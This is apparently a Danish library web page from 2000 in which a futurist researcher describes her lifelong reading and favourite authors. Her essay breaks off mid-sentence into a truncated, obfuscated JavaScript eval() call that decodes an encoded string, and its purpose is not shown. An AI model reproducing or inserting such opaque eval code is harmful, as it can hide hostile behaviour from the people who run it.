Månedens kendte: Maria-Therese Hoppe

Oprettet: 01.05.2000 - 08:00

Månedens kendte: Maria-Therese Hoppe

skrevet af Maria-Therese Hoppe



Maria-Therese Hoppe

Mag.art. i etnologi og forskningschef på "Instituttet for fremtidsforskning". Hun beskæftiger sig især med nye værdier og holdninger og perspektiver på det digitale samfund. Er blandt andet forfatter til den første internetguide på dansk.I det internationale fremtidsforskningstidsskrift "Foresight - the new journal for Future Studies, Strategic Thinking and Policy" fungerer hun som medlem af den redaktionelle gruppe. Læsning fungerer som at trække vejret af Maria -Therese Hoppe."Beskriv dine yndlingsbøger på en side." Jamen, det er en umulig opgave! Læsning fungerer som at trække vejret. Først, når man bliver forhindret, mærkes betydningen af den konstante forsyning af viden, oplevelser, inspiration, tanker. Ikke blot den faglige læsning i arbejdslivet, men nok så meget ledsageren undervejs i kedsommelige venteperioder i lufthavne, fly og tog. Den luksuriøse følelse af at "stjæle" en hel aften til bare at kaste sig ind i romanens verden. Feriens hyldemeter af spændings- og oplevelseshistorier. Glæden ved at opdage, at en af yndlingsforfatterne er kommet med en ny bog. Fryden når en ny god forfatter dukker op. Til min elleveårs fødselsdag forærede mine forældre mig et bibliotekskort til Voksenbiblioteket. I over et år havde jeg af nød måtte genlæse bøgerne på børnebiblioteket, for den gang i halvtredserne vogtede bibliotekarerne strengt over adgangen til det forjættede land: Ingen børn under 12 år på voksenbiblioteket! Så blev porten lukket op, og jeg forslugte mig på bøgerne. De tre musketerer levede alt for kort, desværre vist kun i fire bind, mens Dumas' Lady Diana holdt hele 14 bind. Salighed! Bøger om kunsthistorie åbnede nye visuelle verdener af indtryk: I halvtredserne var tilværelsen ellers billedanoretisk. Palle Laurings historiske bøger blev slugt og fantaseret om, og opdagelsesrejserne - tænk hvis man var med Thor Heyerdahl på tømmerflåden Ra eller med arkæologerne i Bahrain! Siden har jeg ikke standset læsningen. Verden er heldigvis fuld af læseoplevelser, flere og flere. Jeg har ikke yndlingsbøger, men nok yndlingsforfattere. Hvis kreds stadig vokser. Jeg elsker stadigvæk at give mig en god fortæller i vold. Om det er faglitteratur eller skønlitteratur er et uvæsentligt skel. En god forfatter har en god historie at fortælle. Heldigvis er mange forfattere især i den engelsktalende verden ikke bange for rige persongallerier og historier, som fletter sig ud og ind. Salman Rushdie fortryller og forhekser, som i hans sidste nye "The Ground Beneath her Feet" jeg netop er i gang med. Fay Weldon er med stor humor i stand til det samme, men desværre er det længe siden, man har set en roman fra hendes hånd. "The Life and Loves of a She-Devil" er en af hendes bøger, jeg med fryd kunne fristes til at genlæse. Robert Goddard skriver romaner som kammerspil, lag på lag, romaner, hvor handlinger og personer drejes og forskydes med nye betydninger, nye fatale konsekvenser, mens spændingerne stiger og stiger. Lige meget hvor dreven en læser, man er, giver han ny inspiration og overraskelse. "Caught in the Light" er et godt eksempel. I det hele taget har jeg en svaghed for bøger, som lader personerne - og læseren- være i situationer, som kan fortolkes eller forstås på mange måder. John LeCarre er en anden klassiker, hans "The Little Drummer Girl" vender og drejer synsvinklen mellem identifikationer med israeler og palæstinenser, så man lider og svier med heltindens forvirring. Ken Folletts personer er nok mere endimensionale, men han kan kunsten at lade persongalleriet leve i disse dimensioner og at spinde en historie så man må videre. Hans bedste bog er nok "Pillars of the Earth", som giver kød og sjæl til en af Europas mest dynamiske perioder (og for en gammel midelalderhistoriker er det en særlig fryd at hans faglige research samtidig er upåklagelig). Men også hans andre romaner er værd at bruge sommertid på.! Få forfattere formår at skrive med humor, men når jeg træffer på en roman af Carl Hiaasen, er jeg solgt. Hans verden af excentrikere, korrupte politikere og fallerede eksistenser i Miami har en bidende ironi og sort humor parret med satirisk samfunds- og social bevidsthed. Bøger som "Striptease" , "Lucky You" eller "Tourist Season". Medpassagerere i fly har stirret undrende på de latterhulk jeg har forstyrret den trætte forretningsmands-buisnessclass-jeg-er-vigtig-attitude som synes at være gældende kotume i de små konservesdåser af ukomfortable fly jeg tilbringer alt for meget tid i. En anden humoristisk amerikaner med bid i er Elmore Leonard, f.eks. "Freaky Deaky" eller "Get Shorty" Begge forfattere har lidt en krank skæbne ved at blive filmatiseret, for begges vedkommende er det lykkedes filmen at fjerne alt det, der gør deres romaner så gode bekendtskaber ved at strippe dem ned til det nøgne skelet. Samme fatale skæbne er overgået en af tidens største historiefortællere: Stephen King. Jeg har læst hans bøger med fryd siden de første kom frem. Sågar oversat og fortalt enkelte kapitler for mine sønner, da de var halvstore drenge. Men i Danmark blev han udgivet i kastreret udgave. Bøgerne var for lange og for tunge til de formodede læsere af gys og splat, så uden kvaler blev mere end halvdelen af bøgernes indhold barberet væk! Ud med de eminente menneskeskildringer, væk med følelser, væk med miljøerne. Stephen King har en sjælden psykologisk evne til at skildre især børn og unge. En af hans bedste romaner er "It", med fremragende billeder af præpubertetsbørns verden. At kunne huske ud fra barnets synsvinkel uden voksentilværelsens senere censur og idyllisering, er en gave få forfattere har. I Danmark har Hans Edvard Nørregaard- Nielsen med stor visualitet i "Mands Minde" givet et billede af en verden som vækker erindrende genklange lyde og lugte fra min barndoms ferier på landet. Historikeren Troels Troels-Lunds barndomserindringer fra Guldalderens København i 1840'rene har samme umiddelbare kvalitet og fortælletalent. I arbejdslivet giver læsningen anledning til ny inspiration, nye tanker. Her spiller fagtidsskrifter og Internettet den største rolle. Korte oversigter tegner mønstre af nye udviklinger, som måske, måske ikke har betydninger. Tidsskrifter som "The Economist", "Businessweek", "Wired Magazine", internationale livsstilsblade som "GQ", "MAX", "Elle", boligmagasiner fra hele verden som "Sköna Hem", "Elle Decor", eller trendnyhedsbreve som

eval("s='306DjC647E696A31jE616D6560786336555E4E4A4B4C4D4340jj4F4341jE3j555E4E4A4B4C4D4340jj4F434130j36D3j';for(i=0;i
0
Din bedømmelse: Ingen